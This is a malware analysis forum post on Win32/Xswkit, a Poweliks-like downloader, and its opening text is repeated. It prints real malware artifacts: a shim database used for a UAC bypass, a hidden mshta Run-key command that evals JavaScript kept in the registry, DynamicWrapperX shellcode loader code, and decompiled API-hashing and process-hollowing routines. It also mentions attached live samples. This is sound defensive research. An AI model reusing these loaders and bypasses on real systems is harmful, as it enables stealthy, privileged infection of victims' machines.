Credits for sample to Tigzy and R136a1, preliminary analysis done by R136a1.
Win32/Xswkit is another clone of Win32/Poweliks but with number of additions, such as embedded UAC bypass and different startup method (rundll + mshta.exe). Purpose: malware downloader.
Update 04/01/2015
See http://www.kernelmode.info/forum/viewto ... 827#p24827
UAC bypass is similar to used by Gootkit, reconstructed can be found -> here.
During installation Xswkit builds shim database patch, drops it to %temp% folder and executes sdbinst with -q parameter and path to new database. Entry itself is shim RedirectEXE
So malware installation steps are following:
1) generate SDB shim patch and drop it to %temp% folder
2) register shim with sdbinst (no UAC prompt on default UAC settings)
3) run target application -> cliconfg.exe, terminate itself
4) cliconfg.exe (no UAC prompt on default UAC settings) executes malicious shim and starts malware dropper again with given commandline arguments
5) dropper installs itself to the system with full admin rights
Below is R136a1 analysis he was so kind to share.
Loader script is very huge (144kb) as it contains copy of mshta.exe, dynwrapx.dll, their manifests and shellcode, everything you will find in attach.
How malware operates after reboot.
It runs from Software\Microsoft\Windows\CurrentVersion\Run key by rundll32 which executes the following
Once executed it performs the following piece of code read from loader registry value at previous stage
Shellcode uses API hashing and global shellcode description structure, dynamically allocated during execution.
Below is API hashing function
Strings from actual malware
Original dropper, unpacked malware, full loader text and extracted shellcode in attach.
VT
original
https://www.virustotal.com/en/file/ed3d ... 420287664/
unpacked
https://www.virustotal.com/en/file/c388 ... 420287667/
No actual detection only trash.
P.S.
+ actual loading screenshot, as you can see Sysinternals Autoruns cannot recognize this entry as rogue, more to say if you select Verify Digital Signatures it will list it as totally legit.
Win32/Xswkit is another clone of Win32/Poweliks but with number of additions, such as embedded UAC bypass and different startup method (rundll + mshta.exe). Purpose: malware downloader.
Update 04/01/2015
See http://www.kernelmode.info/forum/viewto ... 827#p24827
UAC bypass is similar to used by Gootkit, reconstructed can be found -> here.
During installation Xswkit builds shim database patch, drops it to %temp% folder and executes sdbinst with -q parameter and path to new database. Entry itself is shim RedirectEXE
Code: Select all
<DATABASE tid="0xf0" typ="LIST">
<TIME tid="0xf6" typ="QWORD">0x1d014b31a06ce99</TIME>
<COMPILER_VERSION tid="0x100" typ="STRINGREF">2.1.0.3</COMPILER_VERSION>
<NAME tid="0x106" typ="STRINGREF">qrywI9lBMKdLH</NAME>
<OS_PLATFORM tid="0x10c" typ="DWORD">0x1</OS_PLATFORM>
<DATABASE_ID tid="0x112" typ="BINARY" len="0x10" guid="1AC61212-7AC0-464A-8B9815BC2854072E" />
<LIBRARY tid="0x128" typ="LIST">
</LIBRARY>
<EXE tid="0x12e" typ="LIST">
<NAME tid="0x134" typ="STRINGREF">cliconfg.exe</NAME>
<APP_NAME tid="0x13a" typ="STRINGREF">nv0NK43fWQ</APP_NAME>
<VENDOR tid="0x140" typ="STRINGREF">Microsoft</VENDOR>
<EXE_ID tid="0x146" typ="BINARY" len="0x10" guid="E6D3E2BF-6CBF-0C43-B41AA519B962860C" />
<MATCHING_FILE tid="0x15c" typ="LIST">
<NAME tid="0x162" typ="STRINGREF">*</NAME>
<COMPANY_NAME tid="0x168" typ="STRINGREF">Microsoft Corporation</COMPANY_NAME>
<INTERNAL_NAME tid="0x16e" typ="STRINGREF">cliconfg.exe</INTERNAL_NAME>
</MATCHING_FILE>
<SHIM_REF tid="0x174" typ="LIST">
<NAME tid="0x17a" typ="STRINGREF">RedirectEXE</NAME>
<COMMAND_LINE tid="0x180" typ="STRINGREF">"C:\Malware\1.exe" -z "C:\Users\UserMan\AppData\Local\Temp\AF293.tmp"</COMMAND_LINE>
</SHIM_REF>
</EXE>
</DATABASE>
So malware installation steps are following:
1) generate SDB shim patch and drop it to %temp% folder
2) register shim with sdbinst (no UAC prompt on default UAC settings)
3) run target application -> cliconfg.exe, terminate itself
4) cliconfg.exe (no UAC prompt on default UAC settings) executes malicious shim and starts malware dropper again with given commandline arguments
5) dropper installs itself to the system with full admin rights
Below is R136a1 analysis he was so kind to share.
R136a1 wrote: 1) Set value in Registry:
Key: HKEY_CURRENT_USER\Software
Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)
2) Create Key and set values in Registry:
Key: HKEY_CURRENT_USER\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
3) Create new process C:\WINDOWS\system32\svchost.exe (Process hijack)
4) Exit old process
5) Set value in Registry:
Key: HKEY_CURRENT_USER\Software
Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)
6) Create Key and set values in Registry:
Key: HKEY_USERS\.DEFAULT\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"
7) Create Key and set values in Registry:
Key: HKEY_USERS\S-1-5-19\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"
8) Create Key and set values in Registry:
Key: HKEY_USERS\S-1-5-20\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"
9) Download and install a lot of root certificates
10) Set values in Registry:
Key: HKEY_CURRENT_USER\Software
Value: binaryImage32_0...binaryImage32_5 (REG_BINARY)
Data: ...
11) Inject code into explorer.exe (+ firefox.exe + iexplore.exe after opening)
??? 12) ESENT.dll loading by injected processes ???
13) Create Key and set values in Registry:
Key: HKEY_CURRENT_USER\Software\cxsw
Value: {c1e2bc64-8d94-461f-a485-50a7322bfb4a} (REG_BINARY)
Data: ...
Value: {da14b39e-535a-4b08-9d68-ba6d14fed630} (REG_BINARY)
Data: ...
R136a1 wrote:More from mutex {a1ba4f72-9762-4864-8889-478ac3bdb354}:
https://www.virustotal.com/en/file/658c ... /analysis/
https://www.virustotal.com/en/file/2baf ... /analysis/
More from registry value {d42d0afb-3638-4326-b67b-b0cb954fba94}:
http://totalhash.com/analysis/efd11b782 ... 0c804ece07
http://totalhash.com/analysis/dded6ea73 ... cc5b32bcc5
http://totalhash.com/analysis/0bd288047 ... 9f02b2befa
http://totalhash.com/analysis/258fc44bd ... ee5850c9c1
http://www.threatexpert.com/report.aspx ... e1c1d8b956
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
R136a1 wrote:Malware uses Windows tool mshta.exe and DynamicWrapperX:Lets continue.
http://yuripopov.ucoz.net/index/dwx_reg ... de_en/0-27
Loader script is very huge (144kb) as it contains copy of mshta.exe, dynwrapx.dll, their manifests and shellcode, everything you will find in attach.
How malware operates after reboot.
It runs from Software\Microsoft\Windows\CurrentVersion\Run key by rundll32 which executes the following
Code: Select all
Hidden window with script that does next loading stage.mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"
Once executed it performs the following piece of code read from loader registry value at previous stage
Code: Select all
It attempts to create new ActiveXObject "DynamicWrapperX" which allows code execution, if it failed then it installs this additions in SetupDWX routine.try {
var DWX = new ActiveXObject(\"DynamicWrapperX\");
ExecuteShellCode();
function ExecuteShellCode(){
var CodeAddr = DWX.RegisterCode(ShellcodeHexStr, \"executeCode\", \"i=l\", \"r=l\");
DWX.executeCode(0);
}
Exit();
} catch(e) {
SetupDWX();
}
Code: Select all
Shellcode section also read from loader registry key and this is a final malware startup stage. Main purpose of it - read actual malware body stored in registry as binaryImageXX value data (where XX is platform -32 or 64), start suspended svchost.exe, unmap it original code, map malicious payload and run it.function SetupDWX()
{
if (!FileExists(DefaultDir+\"mshta.exe\")) UnpackResource(\"mshta.exe\", DefaultDir +\"mshta.exe\");
if (!FileExists(DefaultDir+\"dynwrapx.dll\")) UnpackResource(\"dynwrapx.dll\", DefaultDir +\"dynwrapx.dll\");
if (!FileExists(DefaultDir+\"dynwrapx.sxs.manifest\")) UnpackResource(\"dynwrapx.sxs.manifest\", DefaultDir +\"dynwrapx.sxs.manifest\");
if (!FileExists(DefaultDir+\"mshta.exe.manifest\")) UnpackResource(\"mshta.exe.manifest\", DefaultDir +\"mshta.exe.manifest\");
WshShell.Run('\"'+DefaultDir+\"mshta.exe\\\" \\\"\"+HTARunCommand+'\"',0,0);
Exit();
}
Shellcode uses API hashing and global shellcode description structure, dynamically allocated during execution.
Below is API hashing function
Code: Select all
shell context allocation routineunsigned long get_hash(char *s)
{
unsigned long v1 = 0x1505;
while (*s != 0) {
v1 += *(unsigned char *)s + (v1 << 5);
s++;
}
return v1;
}
Code: Select all
and svchost spawning codestruct_v23 *__cdecl CreateShellContext()
{
int hUser32; // eax@4
int v1; // eax@4
int v2; // eax@4
int v4; // [sp+0h] [bp-50h]@1
int v5; // [sp+4h] [bp-4Ch]@1
int v6; // [sp+8h] [bp-48h]@1
int v7; // [sp+Ch] [bp-44h]@1
int v8; // [sp+10h] [bp-40h]@1
int v9; // [sp+14h] [bp-3Ch]@1
int v10; // [sp+18h] [bp-38h]@1
int szAdvapi32; // [sp+1Ch] [bp-34h]@1
int v12; // [sp+20h] [bp-30h]@1
int v13; // [sp+24h] [bp-2Ch]@1
int v14; // [sp+28h] [bp-28h]@1
int szNtdll; // [sp+2Ch] [bp-24h]@1
int v16; // [sp+30h] [bp-20h]@1
int v17; // [sp+34h] [bp-1Ch]@1
int szUser32; // [sp+38h] [bp-18h]@1
int v19; // [sp+3Ch] [bp-14h]@1
int v20; // [sp+40h] [bp-10h]@1
int VirtualAlloc; // [sp+44h] [bp-Ch]@2
int hKernel32; // [sp+48h] [bp-8h]@1
struct_v23 *shell_ctx; // [sp+4Ch] [bp-4h]@1
shell_ctx = 0;
v4 = 'e\0k';
v5 = 'n\0r';
v6 = 'l\0e';
v7 = '2\03';
v8 = 'd\0.';
v9 = 'l\0l';
v10 = 0;
hKernel32 = GetModuleHandle(&v4);
szNtdll = 'ldtn';
v16 = 'ld.l';
v17 = 'l';
szAdvapi32 = 'avda';
v12 = '23ip';
v13 = 'lld.';
v14 = 0;
szUser32 = 'resu';
v19 = 'd.23';
v20 = 'll';
if ( hKernel32 )
{
VirtualAlloc = ApiFromHash(hKernel32, 0x382C0F97u);
if ( VirtualAlloc )
{
shell_ctx = (VirtualAlloc)(0, 0xC4u, 0x3000u, 64);
if ( shell_ctx )
{
shell_ctx->hKernel32 = hKernel32;
shell_ctx->VirtualAlloc = VirtualAlloc;
shell_ctx->VirtualFree = ApiFromHash(shell_ctx->hKernel32, 0x668FCF2Eu);
shell_ctx->Sleep = ApiFromHash(shell_ctx->hKernel32, 0xE19E5FEu);
shell_ctx->LoadLibraryExA = ApiFromHash(shell_ctx->hKernel32, 0x4F803C78u);
shell_ctx->CreateThread = ApiFromHash(shell_ctx->hKernel32, 0x7F08F451u);
shell_ctx->lstrlenA = ApiFromHash(shell_ctx->hKernel32, 0xD2C4AB0Au);
shell_ctx->GetProcAddress = ApiFromHash(shell_ctx->hKernel32, 0xCF31BB1Fu);
shell_ctx->LocalFree = ApiFromHash(shell_ctx->hKernel32, 0xA66DF372u);
shell_ctx->CloseHandle = ApiFromHash(shell_ctx->hKernel32, 0x3870CA07u);
shell_ctx->GetCurrentProcess = ApiFromHash(shell_ctx->hKernel32, 0xCA8D7527u);
shell_ctx->ExpandEnvironmentStringsW = ApiFromHash(shell_ctx->hKernel32, 0x7487495Bu);
shell_ctx->CreateProcessW = ApiFromHash(shell_ctx->hKernel32, 0xAEB52E2Fu);
shell_ctx->GetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0xEBA2CFC2u);
shell_ctx->ReadProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0xB8932459u);
shell_ctx->lstrcatW = ApiFromHash(shell_ctx->hKernel32, 0xD2BFAB79u);
shell_ctx->ResumeThread = ApiFromHash(shell_ctx->hKernel32, 0x74162A6Eu);
shell_ctx->SetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0x7E20964Eu);
shell_ctx->VirtualProtectEx = ApiFromHash(shell_ctx->hKernel32, 0xD812922Au);
shell_ctx->WriteProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0x6F22E8C8u);
shell_ctx->VirtualAllocEx = ApiFromHash(shell_ctx->hKernel32, 0xF36E5AB4u);
shell_ctx->hNtdll = shell_ctx->LoadLibraryExA(&szNtdll, 0, 0);
shell_ctx->RtlCreateHeap = ApiFromHash(shell_ctx->hNtdll, 0xAFAAC189u);
shell_ctx->RtlAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xC0B381DAu);
shell_ctx->RtlReAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xBBC97911u);
shell_ctx->RtlFreeHeap = ApiFromHash(shell_ctx->hNtdll, 0x70BA71D7u);
shell_ctx->NtTerminateThread = ApiFromHash(shell_ctx->hNtdll, 0xAC3C9DC8u);
shell_ctx->RtlDecompressBuffer = ApiFromHash(shell_ctx->hNtdll, 0xF73BBD46u);
shell_ctx->NtOpenKey = ApiFromHash(shell_ctx->hNtdll, 0x4BB73E02u);
shell_ctx->wcslen = ApiFromHash(shell_ctx->hNtdll, 0x24B549F1u);
shell_ctx->NtUnmapViewOfSection = ApiFromHash(shell_ctx->hNtdll, 0x595014ADu);
shell_ctx->hAdvapi32 = shell_ctx->LoadLibraryExA(&szAdvapi32, 0, 0);
shell_ctx->RegOpenKeyExW = ApiFromHash(shell_ctx->hAdvapi32, 0x74A9772u);
shell_ctx->ConvertSidToStringSidW = ApiFromHash(shell_ctx->hAdvapi32, 0x99A22DD7u);
shell_ctx->RegSetValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x345872EAu);
shell_ctx->RegQueryValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x6B95D114u);
shell_ctx->RegOpenKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x74A975Cu);
shell_ctx->RegCreateKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x46CEB39Eu);
shell_ctx->RegCloseKey = ApiFromHash(shell_ctx->hAdvapi32, 0x736B3702u);
shell_ctx->RegEnumKeyA = ApiFromHash(shell_ctx->hAdvapi32, 0xF367EA22u);
shell_ctx->OpenProcessToken = ApiFromHash(shell_ctx->hAdvapi32, 0xC57BD097u);
shell_ctx->GetTokenInformation = ApiFromHash(shell_ctx->hAdvapi32, 0x8ED47F2Cu);
shell_ctx->IsValidSid = ApiFromHash(shell_ctx->hAdvapi32, 0x3D180391u);
hUser32 = (shell_ctx->LoadLibraryExA)(&szUser32, 0, 0);
shell_ctx->MessageBoxA = ApiFromHash(hUser32, 0x384F14B4u);
shell_ctx->wsprintfA = ApiFromHash(hUser32, 0xF898B8C3u);
shell_ctx->wsprintfW = ApiFromHash(hUser32, 0xF898B8D9u);
shell_ctx->hHeap = shell_ctx->RtlCreateHeap(2, 0, 0, 0, 0);
}
}
}
return shell_ctx;
}
Strings from actual malware
Code: Select all
No actual name except RtlCreateUserThread NtClose InternetReadFile HttpOpenRequestA InternetCloseHandle HttpSendRequestA InternetOpenA InternetConnectA HttpQueryInfoA InternetQueryOptionA InternetSetOptionA InternetSetFilePointer HttpAddRequestHeadersA L a s t H a r d w a r e H a s h b i n a r y I m a g e % d % s _ % d \ R E G I S T R Y \ U S E R \ % s \ R e g i s t r y \ U s e r % S y s t e m R o o t % \ S y s t e m 3 2 \ n t d l l . d l l RtlDecompressBuffer ntdll.dll RtlComputeCrc32 a p p h e l p . d l l SdbBeginWriteListTag SdbCloseDatabase SdbCloseDatabaseWrite SdbCommitIndexes SdbCreateDatabase SdbDeclareIndex SdbEndWriteListTag SdbFindFirstDWORDIndexedTag SdbFindFirstTag SdbFindNextTag SdbFormatAttribute SdbFreeFileAttributes SdbGetAppPatchDir SdbGetBinaryTagData SdbGetFileAttributes SdbGetFirstChild SdbGetIndex SdbGetMatchingExe SdbGetNextChild SdbGetStringTagPtr SdbGetTagFromTagID SdbInitDatabase SdbIsStandardDatabase SdbMakeIndexKeyFromString SdbOpenApphelpDetailsDatabase SdbOpenApphelpResourceFile SdbOpenDatabase SdbQueryDataExTagID SdbReadApphelpDetailsData SdbReadBinaryTag SdbReadDWORDTag SdbReadQWORDTag SdbReadStringTag SdbRegisterDatabaseEx SdbReleaseDatabase SdbReleaseMatchingExe SdbStartIndexing SdbStopIndexing SdbTagRefToTagID SdbTagToString SdbUnregisterDatabase SdbWriteBinaryTag SdbWriteBinaryTagFromFile SdbWriteDWORDTag SdbWriteNULLTag SdbWriteQWORDTag SdbWriteStringTag SdbWriteWORDTag ShimFlushCache BaseFlushAppcompatCache generic unknown error iostream iostream stream error system 2 . 1 . 0 . 3 dж@ °H@ PI@ `I@ РH@ 0I@ рH@ з@ °H@ рI@ `I@ J@ 0I@ рH@ Дж@ °H@ ђI@ I@ РH@ 0I@ рH@ °ж@ °H@ 0@ 0@ РH@ 0I@ рH@ SHGetKnownFolderPath Shell32.dll SHGetSpecialFolderPathW \ R e g i s t r y \ M a c h i n e \ S o f t w a r e \ M i c r o s o f t \ C r y p t o g r a p h y M a c h i n e G u i d \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e \ A p p D a t a L o w \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e \ R E G I S T R Y \ U S E R \ % s \ % s S e R e s t o r e P r i v i l e g e dз@ pm@ - z c l i c o n f g . e x e s d b i n s t . e x e a b c d e f g h i j k l m n o p q r s t v u w x y z A B C D E F G H I J K L M N O P Q R S T U V W 0 1 2 3 4 5 6 7 8 9 _ A S y s W O W 6 4 s y s t e m 3 2 \ M i c r o s o f t R e d i r e c t E X E M i c r o s o f t C o r p o r a t i o n * " " - q " % s " - q - u " % s " r u n a s IsWow64Process k e r n e l 3 2 . d l l explorer.exe chrome.exe opera.exe iexplore.exe lsass.exe firefox.exe LoadLibraryExA kernel32.dll GetProcAddress VirtualProtect VirtualAlloc CreateThread VirtualQuery ZwOpenProcess % S y s t e m R o o t % \ S y s t e m 3 2 \ b i n a r y I m a g e 3 2 l o a d e r { d 4 2 d 0 a f b - 3 6 3 8 - 4 3 2 6 - b 6 7 b - b 0 c b 9 5 4 f b a 9 4 } w i n d i r % s \ s y s t e m 3 2 \ c m d . e x e / c " s t a r t % s " d e s k t o p . i n i { 2 7 3 b 5 8 8 4 - 3 6 2 d - 4 f f 7 - 8 d 6 5 - 6 4 a c 2 e 7 f c 2 9 1 } \ h u i % s \ h u i % d . e x e { a 1 b a 4 f 7 2 - 9 7 6 2 - 4 8 6 4 - 8 8 8 9 - 4 7 8 a c 3 b d b 3 5 4 } \ s v c h o s t . e x e s v c h o s t . e x e @ @ LdrGetProcedureAddress NtAllocateVirtualMemory NtFreeVirtualMemory NtWriteVirtualMemory H F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb
F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdbI'm curious when they realize that /DEBUG option should be turned off in release builds.
Original dropper, unpacked malware, full loader text and extracted shellcode in attach.
VT
original
https://www.virustotal.com/en/file/ed3d ... 420287664/
unpacked
https://www.virustotal.com/en/file/c388 ... 420287667/
No actual detection only trash.
P.S.
+ actual loading screenshot, as you can see Sysinternals Autoruns cannot recognize this entry as rogue, more to say if you select Verify Digital Signatures it will list it as totally legit.
Attachments
pass: infected
(301.16 KiB) Downloaded 191 times
(301.16 KiB) Downloaded 191 times
Ring0 - the source of inspiration